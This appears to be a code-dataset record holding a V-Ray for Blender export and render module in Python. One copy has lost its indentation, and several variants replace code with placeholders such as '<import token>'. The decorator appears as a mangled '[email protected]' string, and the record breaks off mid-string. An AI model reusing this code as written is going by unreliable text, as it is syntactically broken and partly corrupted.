fm.setOverwriteGeometry(VRayExporter.auto_meshes)
rtExporter = HAS_VB35 and engine.bl_idname == 'VRAY_RENDER_RT'
try:
fm.init(not rtExporter)
except Exception as e:
debug.ExceptionInfo(e)
return "Error initing files!"
o.setFileManager(fm)
o.setPreview(engine.is_preview)
if not rtExporter:
bus['exporter'] = exp_init.InitExporter(bus)
try:
# We do everything here basically because we want to close files
        # if something goes wrong...
if not rtExporter:
err = Export(bus, scene, engine, engine.is_preview)
else:
if not VRayExporter.animation_mode in {'NONE', 'CAMERA_LOOP'}:
o.setAnimation(True)
o.setFrameStart(scene.frame_start)
o.setFrameEnd(scene.frame_end)
o.setFrameStep(scene.frame_step)
elif VRayExporter.animation_mode == 'CAMERA_LOOP':
cameraCount = len([1 for o in scene.objects if o.type == 'CAMERA' and o.data.vray.use_camera_loop])
o.setAnimation(True)
o.setFrameStart(1)
o.setFrameEnd(cameraCount)
o.setFrameStep(1)
init = {
'context' : bpy.context.as_pointer(),
'engine' : engine.as_pointer(),
'data' : bpy.data.as_pointer(),
'scene' : scene.as_pointer(),
'mainFile' : fm.getFilePathByPluginType('MAIN'),
'objectFile' : fm.getFilePathByPluginType('OBJECT'),
'envFile' : fm.getFilePathByPluginType('WORLD'),
'geometryFile' : fm.getFilePathByPluginType('GEOMETRY'),
'lightsFile' : fm.getFilePathByPluginType('LIGHT'),
'materialFile' : fm.getFilePathByPluginType('MATERIAL'),
'textureFile' : fm.getFilePathByPluginType('TEXTURE'),
'cameraFile' : fm.getFilePathByPluginType('CAMERA'),
}
# Free anything we have
if engine.renderer:
del engine.renderer
renderer = _vray_for_blender_rt.init(**init)
if renderer:
setattr(engine, 'renderer', renderer)
_vray_for_blender_rt.render(renderer)
except Exception as e:
debug.ExceptionInfo(e)
err = str(e)
finally:
exp_init.ShutdownExporter(bus)
return err
def ExportAndRun(engine, scene):
if engine.test_break():
return "Export is interrupted!"
VRayScene = scene.vray
o = VRayPluginExporter()
bus = {
'output' : o,
'engine' : engine,
'scene' : scene,
'camera' : scene.camera,
'skipObjects' : set(),
'environment_volume' : set(),
'gizmos' : set(),
'preview' : engine.is_preview,
# Used to pass nodes into plugin exporter
# to access some special data like "fake" textures
'context' : {
'node' : None,
},
'cache' : {
'plugins' : set(),
'mesh' : set(),
},
'defaults' : {
'brdf' : "BRDFNOBRDFISSET",
'material' : "MANOMATERIALISSET",
'texture' : "TENOTEXTUREIESSET",
'uvwgen' : "DEFAULTUVWC",
'blend' : "TEDefaultBlend",
},
}
if bus['camera'].type != 'CAMERA':
return "Scene's active camera is not of type camera"
err = ExportEx(bus)
if err is not None:
return err
err = exp_run.RunEx(bus)
if err is not None:
return err
return None
# First check the animation type:
#
# 'FRAMEBYFRAME' "Export and render frame by frame"
# 'FULL' "Export full animation range then render"
# 'NOTMESHES' "Export full animation range without meshes"
# 'CAMERA' "Export full animation of camera motion"
#
# 'FRAMEBYFRAME' should also support exporting of 2 (or more) frames at once for correct motion blur
#
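# Reading the code in this module: 'FRAMEBYFRAME' is the only mode handled by
# the frame loop in RenderScene() below; 'CAMERA_LOOP' goes through
# exp_anim_camera_loop.ExportCameraLoop() in Export(), and the remaining
# full-range modes go through exp_anim_full.ExportAnimation() (or, on the RT
# exporter path, the setAnimation()/setFrame*() calls in ExportEx()).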
def RenderScene(engine, scene):
VRayScene = scene.vray
VRayExporter = VRayScene.Exporter
err = None
if VRayExporter.animation_mode == 'FRAMEBYFRAME':
# Store current frame
selected_frame = scene.frame_current
f = scene.frame_start
while(f <= scene.frame_end):
scene.frame_set(f)
err = ExportAndRun(engine, scene)
if err is not None:
break
f += scene.frame_step
# Restore selected frame
scene.frame_set(selected_frame)
else:
err = ExportAndRun(engine, scene)
return err
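# Usage note (not from the original file): RenderScene() is the entry point of
# this module; it returns None on success or an error string on failure, so a
# caller inside the add-on would typically do something like:
#
#     err = RenderScene(engine, scene)
#     if err is not None:
#         debug.PrintMsg('Render failed: %s' % err)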
| [
"#\n# V-Ray For Blender\n#\n# http://chaosgroup.com\n#\n# Author: Andrei Izrantcev\n# E-Mail: [email protected]\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n#\n# All Rights Reserved. V-Ray(R) is a registered trademark of Chaos Software.\n#\n\nimport os\nimport time\nimport datetime\n\nimport bpy\n\nfrom vb30.lib.VRayStream import VRayExportFiles\nfrom vb30.lib.VRayStream import VRayPluginExporter\nfrom vb30.lib.VRayStream import VRayFilePaths\n\nfrom vb30.lib import SysUtils, BlenderUtils\n\nfrom vb30.nodes import export as NodesExport\n\nfrom vb30.exporting import exp_init\nfrom vb30.exporting import exp_settings\nfrom vb30.exporting import exp_channels\nfrom vb30.exporting import exp_frame\nfrom vb30.exporting import exp_run\nfrom vb30.exporting import exp_anim_full\nfrom vb30.exporting import exp_anim_camera_loop\n\nfrom vb30 import debug\n\nHAS_VB35 = SysUtils.hasRtExporter()\nif HAS_VB35:\n import _vray_for_blender_rt\n\[email protected]\ndef Export(bus, scene, engine, isPreview=False):\n o = bus['output']\n\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n\n ts = time.time()\n\n o.write('MAIN', \"\\n\")\n o.write('MAIN', SysUtils.GetVRsceneTemplate(\"defaults.vrscene\"))\n\n if VRayExporter.draft:\n o.write('MAIN', \"\\n\")\n o.write('MAIN', SysUtils.GetVRsceneTemplate(\"draft.vrscene\"))\n\n exp_channels.ExportRenderElements(bus)\n\n if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:\n err = exp_frame.ExportSingleFrame(bus)\n\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n err = exp_anim_camera_loop.ExportCameraLoop(bus)\n\n else:\n err = exp_anim_full.ExportAnimation(bus,\n scene.frame_start,\n scene.frame_end,\n scene.frame_step\n )\n\n if VRayScene.Includer.use:\n if VRayScene.Includer.use:\n o.write('MAIN', \"\\n// Include additional *.vrscene files\")\n for includeFile in VRayScene.Includer.nodes:\n if not includeFile.use:\n continue\n filepath = BlenderUtils.GetFullFilepath(includeFile.scene)\n o.write('MAIN', '\\n#include \"%s\" // %s' % (filepath, includeFile.name))\n o.write('MAIN', '\\n')\n\n # No need for interpolate() anymore\n o.setAnimation(False)\n exp_settings.ExportSettings(bus)\n\n te = time.time() - ts\n td = datetime.timedelta(seconds=te)\n d = datetime.datetime(1,1,1) + td\n\n if not bus['preview']:\n debug.PrintMsg(\"Export done [%.2i:%.2i:%.2i]\" % (d.hour, d.minute, d.second))\n\n return err\n\n\ndef ExportEx(bus):\n debug.Debug(\"ExportEx()\")\n\n err = None\n\n scene = bus['scene']\n engine = bus['engine']\n o = bus['output']\n\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n\n pm = VRayFilePaths()\n\n # Setting user defined value here\n # It could be overriden in 'initFromScene'\n # depending on VRayDR settings\n pm.setSeparateFiles(VRayExporter.useSeparateFiles)\n\n pm.initFromScene(engine, scene)\n pm.printInfo()\n\n fm = VRayExportFiles(pm)\n fm.setOverwriteGeometry(VRayExporter.auto_meshes)\n\n rtExporter = HAS_VB35 
and engine.bl_idname == 'VRAY_RENDER_RT'\n try:\n fm.init(not rtExporter)\n except Exception as e:\n debug.ExceptionInfo(e)\n return \"Error initing files!\"\n\n o.setFileManager(fm)\n o.setPreview(engine.is_preview)\n\n if not rtExporter:\n bus['exporter'] = exp_init.InitExporter(bus)\n\n try:\n # We do everything here basically because we want to close files\n # if smth goes wrong...\n if not rtExporter:\n err = Export(bus, scene, engine, engine.is_preview)\n else:\n if not VRayExporter.animation_mode in {'NONE', 'CAMERA_LOOP'}:\n o.setAnimation(True)\n o.setFrameStart(scene.frame_start)\n o.setFrameEnd(scene.frame_end)\n o.setFrameStep(scene.frame_step)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n cameraCount = len([1 for o in scene.objects if o.type == 'CAMERA' and o.data.vray.use_camera_loop])\n o.setAnimation(True)\n o.setFrameStart(1)\n o.setFrameEnd(cameraCount)\n o.setFrameStep(1)\n\n init = {\n 'context' : bpy.context.as_pointer(),\n 'engine' : engine.as_pointer(),\n 'data' : bpy.data.as_pointer(),\n 'scene' : scene.as_pointer(),\n 'mainFile' : fm.getFilePathByPluginType('MAIN'),\n 'objectFile' : fm.getFilePathByPluginType('OBJECT'),\n 'envFile' : fm.getFilePathByPluginType('WORLD'),\n 'geometryFile' : fm.getFilePathByPluginType('GEOMETRY'),\n 'lightsFile' : fm.getFilePathByPluginType('LIGHT'),\n 'materialFile' : fm.getFilePathByPluginType('MATERIAL'),\n 'textureFile' : fm.getFilePathByPluginType('TEXTURE'),\n 'cameraFile' : fm.getFilePathByPluginType('CAMERA'),\n }\n\n # Free anything we have\n if engine.renderer:\n del engine.renderer\n\n renderer = _vray_for_blender_rt.init(**init)\n if renderer:\n setattr(engine, 'renderer', renderer)\n _vray_for_blender_rt.render(renderer)\n\n except Exception as e:\n debug.ExceptionInfo(e)\n err = str(e)\n finally:\n exp_init.ShutdownExporter(bus)\n\n return err\n\n\ndef ExportAndRun(engine, scene):\n if engine.test_break():\n return \"Export is interrupted!\"\n\n VRayScene = scene.vray\n\n o = VRayPluginExporter()\n\n bus = {\n 'output' : o,\n\n 'engine' : engine,\n 'scene' : scene,\n 'camera' : scene.camera,\n\n 'skipObjects' : set(),\n 'environment_volume' : set(),\n 'gizmos' : set(),\n\n 'preview' : engine.is_preview,\n\n # Used to pass nodes into plugin exporter\n # to access some special data like \"fake\" textures\n 'context' : {\n 'node' : None,\n },\n\n 'cache' : {\n 'plugins' : set(),\n 'mesh' : set(),\n },\n\n 'defaults' : {\n 'brdf' : \"BRDFNOBRDFISSET\",\n 'material' : \"MANOMATERIALISSET\",\n 'texture' : \"TENOTEXTUREIESSET\",\n 'uvwgen' : \"DEFAULTUVWC\",\n 'blend' : \"TEDefaultBlend\",\n },\n }\n\n if bus['camera'].type != 'CAMERA':\n return \"Scene's active camera is not of type camera\"\n\n err = ExportEx(bus)\n if err is not None:\n return err\n\n err = exp_run.RunEx(bus)\n if err is not None:\n return err\n\n return None\n\n\n# First check the animation type:\n#\n# 'FRAMEBYFRAME' \"Export and render frame by frame\"\n# 'FULL' \"Export full animation range then render\"\n# 'NOTMESHES' \"Export full animation range without meshes\"\n# 'CAMERA' \"Export full animation of camera motion\"\n#\n# 'FRAMEBYFRAME' should also support exporting of 2 (or more) frames at once for correct motion blur\n#\ndef RenderScene(engine, scene):\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n\n err = None\n\n if VRayExporter.animation_mode == 'FRAMEBYFRAME':\n # Store current frame\n selected_frame = scene.frame_current\n\n f = scene.frame_start\n while(f <= scene.frame_end):\n scene.frame_set(f)\n\n err = 
ExportAndRun(engine, scene)\n if err is not None:\n break\n\n f += scene.frame_step\n\n # Restore selected frame\n scene.frame_set(selected_frame)\n\n else:\n err = ExportAndRun(engine, scene)\n\n return err\n",
"import os\nimport time\nimport datetime\nimport bpy\nfrom vb30.lib.VRayStream import VRayExportFiles\nfrom vb30.lib.VRayStream import VRayPluginExporter\nfrom vb30.lib.VRayStream import VRayFilePaths\nfrom vb30.lib import SysUtils, BlenderUtils\nfrom vb30.nodes import export as NodesExport\nfrom vb30.exporting import exp_init\nfrom vb30.exporting import exp_settings\nfrom vb30.exporting import exp_channels\nfrom vb30.exporting import exp_frame\nfrom vb30.exporting import exp_run\nfrom vb30.exporting import exp_anim_full\nfrom vb30.exporting import exp_anim_camera_loop\nfrom vb30 import debug\nHAS_VB35 = SysUtils.hasRtExporter()\nif HAS_VB35:\n import _vray_for_blender_rt\n\n\[email protected]\ndef Export(bus, scene, engine, isPreview=False):\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n ts = time.time()\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('defaults.vrscene'))\n if VRayExporter.draft:\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('draft.vrscene'))\n exp_channels.ExportRenderElements(bus)\n if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:\n err = exp_frame.ExportSingleFrame(bus)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n err = exp_anim_camera_loop.ExportCameraLoop(bus)\n else:\n err = exp_anim_full.ExportAnimation(bus, scene.frame_start, scene.\n frame_end, scene.frame_step)\n if VRayScene.Includer.use:\n if VRayScene.Includer.use:\n o.write('MAIN', '\\n// Include additional *.vrscene files')\n for includeFile in VRayScene.Includer.nodes:\n if not includeFile.use:\n continue\n filepath = BlenderUtils.GetFullFilepath(includeFile.scene)\n o.write('MAIN', '\\n#include \"%s\" // %s' % (filepath,\n includeFile.name))\n o.write('MAIN', '\\n')\n o.setAnimation(False)\n exp_settings.ExportSettings(bus)\n te = time.time() - ts\n td = datetime.timedelta(seconds=te)\n d = datetime.datetime(1, 1, 1) + td\n if not bus['preview']:\n debug.PrintMsg('Export done [%.2i:%.2i:%.2i]' % (d.hour, d.minute,\n d.second))\n return err\n\n\ndef ExportEx(bus):\n debug.Debug('ExportEx()')\n err = None\n scene = bus['scene']\n engine = bus['engine']\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n pm = VRayFilePaths()\n pm.setSeparateFiles(VRayExporter.useSeparateFiles)\n pm.initFromScene(engine, scene)\n pm.printInfo()\n fm = VRayExportFiles(pm)\n fm.setOverwriteGeometry(VRayExporter.auto_meshes)\n rtExporter = HAS_VB35 and engine.bl_idname == 'VRAY_RENDER_RT'\n try:\n fm.init(not rtExporter)\n except Exception as e:\n debug.ExceptionInfo(e)\n return 'Error initing files!'\n o.setFileManager(fm)\n o.setPreview(engine.is_preview)\n if not rtExporter:\n bus['exporter'] = exp_init.InitExporter(bus)\n try:\n if not rtExporter:\n err = Export(bus, scene, engine, engine.is_preview)\n else:\n if not VRayExporter.animation_mode in {'NONE', 'CAMERA_LOOP'}:\n o.setAnimation(True)\n o.setFrameStart(scene.frame_start)\n o.setFrameEnd(scene.frame_end)\n o.setFrameStep(scene.frame_step)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n cameraCount = len([(1) for o in scene.objects if o.type ==\n 'CAMERA' and o.data.vray.use_camera_loop])\n o.setAnimation(True)\n o.setFrameStart(1)\n o.setFrameEnd(cameraCount)\n o.setFrameStep(1)\n init = {'context': bpy.context.as_pointer(), 'engine': engine.\n as_pointer(), 'data': bpy.data.as_pointer(), 'scene': scene\n .as_pointer(), 'mainFile': fm.getFilePathByPluginType(\n 'MAIN'), 'objectFile': fm.getFilePathByPluginType('OBJECT'),\n 
'envFile': fm.getFilePathByPluginType('WORLD'),\n 'geometryFile': fm.getFilePathByPluginType('GEOMETRY'),\n 'lightsFile': fm.getFilePathByPluginType('LIGHT'),\n 'materialFile': fm.getFilePathByPluginType('MATERIAL'),\n 'textureFile': fm.getFilePathByPluginType('TEXTURE'),\n 'cameraFile': fm.getFilePathByPluginType('CAMERA')}\n if engine.renderer:\n del engine.renderer\n renderer = _vray_for_blender_rt.init(**init)\n if renderer:\n setattr(engine, 'renderer', renderer)\n _vray_for_blender_rt.render(renderer)\n except Exception as e:\n debug.ExceptionInfo(e)\n err = str(e)\n finally:\n exp_init.ShutdownExporter(bus)\n return err\n\n\ndef ExportAndRun(engine, scene):\n if engine.test_break():\n return 'Export is interrupted!'\n VRayScene = scene.vray\n o = VRayPluginExporter()\n bus = {'output': o, 'engine': engine, 'scene': scene, 'camera': scene.\n camera, 'skipObjects': set(), 'environment_volume': set(), 'gizmos':\n set(), 'preview': engine.is_preview, 'context': {'node': None},\n 'cache': {'plugins': set(), 'mesh': set()}, 'defaults': {'brdf':\n 'BRDFNOBRDFISSET', 'material': 'MANOMATERIALISSET', 'texture':\n 'TENOTEXTUREIESSET', 'uvwgen': 'DEFAULTUVWC', 'blend':\n 'TEDefaultBlend'}}\n if bus['camera'].type != 'CAMERA':\n return \"Scene's active camera is not of type camera\"\n err = ExportEx(bus)\n if err is not None:\n return err\n err = exp_run.RunEx(bus)\n if err is not None:\n return err\n return None\n\n\ndef RenderScene(engine, scene):\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n err = None\n if VRayExporter.animation_mode == 'FRAMEBYFRAME':\n selected_frame = scene.frame_current\n f = scene.frame_start\n while f <= scene.frame_end:\n scene.frame_set(f)\n err = ExportAndRun(engine, scene)\n if err is not None:\n break\n f += scene.frame_step\n scene.frame_set(selected_frame)\n else:\n err = ExportAndRun(engine, scene)\n return err\n",
"<import token>\nHAS_VB35 = SysUtils.hasRtExporter()\nif HAS_VB35:\n import _vray_for_blender_rt\n\n\[email protected]\ndef Export(bus, scene, engine, isPreview=False):\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n ts = time.time()\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('defaults.vrscene'))\n if VRayExporter.draft:\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('draft.vrscene'))\n exp_channels.ExportRenderElements(bus)\n if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:\n err = exp_frame.ExportSingleFrame(bus)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n err = exp_anim_camera_loop.ExportCameraLoop(bus)\n else:\n err = exp_anim_full.ExportAnimation(bus, scene.frame_start, scene.\n frame_end, scene.frame_step)\n if VRayScene.Includer.use:\n if VRayScene.Includer.use:\n o.write('MAIN', '\\n// Include additional *.vrscene files')\n for includeFile in VRayScene.Includer.nodes:\n if not includeFile.use:\n continue\n filepath = BlenderUtils.GetFullFilepath(includeFile.scene)\n o.write('MAIN', '\\n#include \"%s\" // %s' % (filepath,\n includeFile.name))\n o.write('MAIN', '\\n')\n o.setAnimation(False)\n exp_settings.ExportSettings(bus)\n te = time.time() - ts\n td = datetime.timedelta(seconds=te)\n d = datetime.datetime(1, 1, 1) + td\n if not bus['preview']:\n debug.PrintMsg('Export done [%.2i:%.2i:%.2i]' % (d.hour, d.minute,\n d.second))\n return err\n\n\ndef ExportEx(bus):\n debug.Debug('ExportEx()')\n err = None\n scene = bus['scene']\n engine = bus['engine']\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n pm = VRayFilePaths()\n pm.setSeparateFiles(VRayExporter.useSeparateFiles)\n pm.initFromScene(engine, scene)\n pm.printInfo()\n fm = VRayExportFiles(pm)\n fm.setOverwriteGeometry(VRayExporter.auto_meshes)\n rtExporter = HAS_VB35 and engine.bl_idname == 'VRAY_RENDER_RT'\n try:\n fm.init(not rtExporter)\n except Exception as e:\n debug.ExceptionInfo(e)\n return 'Error initing files!'\n o.setFileManager(fm)\n o.setPreview(engine.is_preview)\n if not rtExporter:\n bus['exporter'] = exp_init.InitExporter(bus)\n try:\n if not rtExporter:\n err = Export(bus, scene, engine, engine.is_preview)\n else:\n if not VRayExporter.animation_mode in {'NONE', 'CAMERA_LOOP'}:\n o.setAnimation(True)\n o.setFrameStart(scene.frame_start)\n o.setFrameEnd(scene.frame_end)\n o.setFrameStep(scene.frame_step)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n cameraCount = len([(1) for o in scene.objects if o.type ==\n 'CAMERA' and o.data.vray.use_camera_loop])\n o.setAnimation(True)\n o.setFrameStart(1)\n o.setFrameEnd(cameraCount)\n o.setFrameStep(1)\n init = {'context': bpy.context.as_pointer(), 'engine': engine.\n as_pointer(), 'data': bpy.data.as_pointer(), 'scene': scene\n .as_pointer(), 'mainFile': fm.getFilePathByPluginType(\n 'MAIN'), 'objectFile': fm.getFilePathByPluginType('OBJECT'),\n 'envFile': fm.getFilePathByPluginType('WORLD'),\n 'geometryFile': fm.getFilePathByPluginType('GEOMETRY'),\n 'lightsFile': fm.getFilePathByPluginType('LIGHT'),\n 'materialFile': fm.getFilePathByPluginType('MATERIAL'),\n 'textureFile': fm.getFilePathByPluginType('TEXTURE'),\n 'cameraFile': fm.getFilePathByPluginType('CAMERA')}\n if engine.renderer:\n del engine.renderer\n renderer = _vray_for_blender_rt.init(**init)\n if renderer:\n setattr(engine, 'renderer', renderer)\n _vray_for_blender_rt.render(renderer)\n except Exception as e:\n debug.ExceptionInfo(e)\n err = str(e)\n 
finally:\n exp_init.ShutdownExporter(bus)\n return err\n\n\ndef ExportAndRun(engine, scene):\n if engine.test_break():\n return 'Export is interrupted!'\n VRayScene = scene.vray\n o = VRayPluginExporter()\n bus = {'output': o, 'engine': engine, 'scene': scene, 'camera': scene.\n camera, 'skipObjects': set(), 'environment_volume': set(), 'gizmos':\n set(), 'preview': engine.is_preview, 'context': {'node': None},\n 'cache': {'plugins': set(), 'mesh': set()}, 'defaults': {'brdf':\n 'BRDFNOBRDFISSET', 'material': 'MANOMATERIALISSET', 'texture':\n 'TENOTEXTUREIESSET', 'uvwgen': 'DEFAULTUVWC', 'blend':\n 'TEDefaultBlend'}}\n if bus['camera'].type != 'CAMERA':\n return \"Scene's active camera is not of type camera\"\n err = ExportEx(bus)\n if err is not None:\n return err\n err = exp_run.RunEx(bus)\n if err is not None:\n return err\n return None\n\n\ndef RenderScene(engine, scene):\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n err = None\n if VRayExporter.animation_mode == 'FRAMEBYFRAME':\n selected_frame = scene.frame_current\n f = scene.frame_start\n while f <= scene.frame_end:\n scene.frame_set(f)\n err = ExportAndRun(engine, scene)\n if err is not None:\n break\n f += scene.frame_step\n scene.frame_set(selected_frame)\n else:\n err = ExportAndRun(engine, scene)\n return err\n",
"<import token>\n<assignment token>\nif HAS_VB35:\n import _vray_for_blender_rt\n\n\[email protected]\ndef Export(bus, scene, engine, isPreview=False):\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n ts = time.time()\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('defaults.vrscene'))\n if VRayExporter.draft:\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('draft.vrscene'))\n exp_channels.ExportRenderElements(bus)\n if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:\n err = exp_frame.ExportSingleFrame(bus)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n err = exp_anim_camera_loop.ExportCameraLoop(bus)\n else:\n err = exp_anim_full.ExportAnimation(bus, scene.frame_start, scene.\n frame_end, scene.frame_step)\n if VRayScene.Includer.use:\n if VRayScene.Includer.use:\n o.write('MAIN', '\\n// Include additional *.vrscene files')\n for includeFile in VRayScene.Includer.nodes:\n if not includeFile.use:\n continue\n filepath = BlenderUtils.GetFullFilepath(includeFile.scene)\n o.write('MAIN', '\\n#include \"%s\" // %s' % (filepath,\n includeFile.name))\n o.write('MAIN', '\\n')\n o.setAnimation(False)\n exp_settings.ExportSettings(bus)\n te = time.time() - ts\n td = datetime.timedelta(seconds=te)\n d = datetime.datetime(1, 1, 1) + td\n if not bus['preview']:\n debug.PrintMsg('Export done [%.2i:%.2i:%.2i]' % (d.hour, d.minute,\n d.second))\n return err\n\n\ndef ExportEx(bus):\n debug.Debug('ExportEx()')\n err = None\n scene = bus['scene']\n engine = bus['engine']\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n pm = VRayFilePaths()\n pm.setSeparateFiles(VRayExporter.useSeparateFiles)\n pm.initFromScene(engine, scene)\n pm.printInfo()\n fm = VRayExportFiles(pm)\n fm.setOverwriteGeometry(VRayExporter.auto_meshes)\n rtExporter = HAS_VB35 and engine.bl_idname == 'VRAY_RENDER_RT'\n try:\n fm.init(not rtExporter)\n except Exception as e:\n debug.ExceptionInfo(e)\n return 'Error initing files!'\n o.setFileManager(fm)\n o.setPreview(engine.is_preview)\n if not rtExporter:\n bus['exporter'] = exp_init.InitExporter(bus)\n try:\n if not rtExporter:\n err = Export(bus, scene, engine, engine.is_preview)\n else:\n if not VRayExporter.animation_mode in {'NONE', 'CAMERA_LOOP'}:\n o.setAnimation(True)\n o.setFrameStart(scene.frame_start)\n o.setFrameEnd(scene.frame_end)\n o.setFrameStep(scene.frame_step)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n cameraCount = len([(1) for o in scene.objects if o.type ==\n 'CAMERA' and o.data.vray.use_camera_loop])\n o.setAnimation(True)\n o.setFrameStart(1)\n o.setFrameEnd(cameraCount)\n o.setFrameStep(1)\n init = {'context': bpy.context.as_pointer(), 'engine': engine.\n as_pointer(), 'data': bpy.data.as_pointer(), 'scene': scene\n .as_pointer(), 'mainFile': fm.getFilePathByPluginType(\n 'MAIN'), 'objectFile': fm.getFilePathByPluginType('OBJECT'),\n 'envFile': fm.getFilePathByPluginType('WORLD'),\n 'geometryFile': fm.getFilePathByPluginType('GEOMETRY'),\n 'lightsFile': fm.getFilePathByPluginType('LIGHT'),\n 'materialFile': fm.getFilePathByPluginType('MATERIAL'),\n 'textureFile': fm.getFilePathByPluginType('TEXTURE'),\n 'cameraFile': fm.getFilePathByPluginType('CAMERA')}\n if engine.renderer:\n del engine.renderer\n renderer = _vray_for_blender_rt.init(**init)\n if renderer:\n setattr(engine, 'renderer', renderer)\n _vray_for_blender_rt.render(renderer)\n except Exception as e:\n debug.ExceptionInfo(e)\n err = str(e)\n finally:\n 
exp_init.ShutdownExporter(bus)\n return err\n\n\ndef ExportAndRun(engine, scene):\n if engine.test_break():\n return 'Export is interrupted!'\n VRayScene = scene.vray\n o = VRayPluginExporter()\n bus = {'output': o, 'engine': engine, 'scene': scene, 'camera': scene.\n camera, 'skipObjects': set(), 'environment_volume': set(), 'gizmos':\n set(), 'preview': engine.is_preview, 'context': {'node': None},\n 'cache': {'plugins': set(), 'mesh': set()}, 'defaults': {'brdf':\n 'BRDFNOBRDFISSET', 'material': 'MANOMATERIALISSET', 'texture':\n 'TENOTEXTUREIESSET', 'uvwgen': 'DEFAULTUVWC', 'blend':\n 'TEDefaultBlend'}}\n if bus['camera'].type != 'CAMERA':\n return \"Scene's active camera is not of type camera\"\n err = ExportEx(bus)\n if err is not None:\n return err\n err = exp_run.RunEx(bus)\n if err is not None:\n return err\n return None\n\n\ndef RenderScene(engine, scene):\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n err = None\n if VRayExporter.animation_mode == 'FRAMEBYFRAME':\n selected_frame = scene.frame_current\n f = scene.frame_start\n while f <= scene.frame_end:\n scene.frame_set(f)\n err = ExportAndRun(engine, scene)\n if err is not None:\n break\n f += scene.frame_step\n scene.frame_set(selected_frame)\n else:\n err = ExportAndRun(engine, scene)\n return err\n",
"<import token>\n<assignment token>\n<code token>\n\n\[email protected]\ndef Export(bus, scene, engine, isPreview=False):\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n ts = time.time()\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('defaults.vrscene'))\n if VRayExporter.draft:\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('draft.vrscene'))\n exp_channels.ExportRenderElements(bus)\n if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:\n err = exp_frame.ExportSingleFrame(bus)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n err = exp_anim_camera_loop.ExportCameraLoop(bus)\n else:\n err = exp_anim_full.ExportAnimation(bus, scene.frame_start, scene.\n frame_end, scene.frame_step)\n if VRayScene.Includer.use:\n if VRayScene.Includer.use:\n o.write('MAIN', '\\n// Include additional *.vrscene files')\n for includeFile in VRayScene.Includer.nodes:\n if not includeFile.use:\n continue\n filepath = BlenderUtils.GetFullFilepath(includeFile.scene)\n o.write('MAIN', '\\n#include \"%s\" // %s' % (filepath,\n includeFile.name))\n o.write('MAIN', '\\n')\n o.setAnimation(False)\n exp_settings.ExportSettings(bus)\n te = time.time() - ts\n td = datetime.timedelta(seconds=te)\n d = datetime.datetime(1, 1, 1) + td\n if not bus['preview']:\n debug.PrintMsg('Export done [%.2i:%.2i:%.2i]' % (d.hour, d.minute,\n d.second))\n return err\n\n\ndef ExportEx(bus):\n debug.Debug('ExportEx()')\n err = None\n scene = bus['scene']\n engine = bus['engine']\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n pm = VRayFilePaths()\n pm.setSeparateFiles(VRayExporter.useSeparateFiles)\n pm.initFromScene(engine, scene)\n pm.printInfo()\n fm = VRayExportFiles(pm)\n fm.setOverwriteGeometry(VRayExporter.auto_meshes)\n rtExporter = HAS_VB35 and engine.bl_idname == 'VRAY_RENDER_RT'\n try:\n fm.init(not rtExporter)\n except Exception as e:\n debug.ExceptionInfo(e)\n return 'Error initing files!'\n o.setFileManager(fm)\n o.setPreview(engine.is_preview)\n if not rtExporter:\n bus['exporter'] = exp_init.InitExporter(bus)\n try:\n if not rtExporter:\n err = Export(bus, scene, engine, engine.is_preview)\n else:\n if not VRayExporter.animation_mode in {'NONE', 'CAMERA_LOOP'}:\n o.setAnimation(True)\n o.setFrameStart(scene.frame_start)\n o.setFrameEnd(scene.frame_end)\n o.setFrameStep(scene.frame_step)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n cameraCount = len([(1) for o in scene.objects if o.type ==\n 'CAMERA' and o.data.vray.use_camera_loop])\n o.setAnimation(True)\n 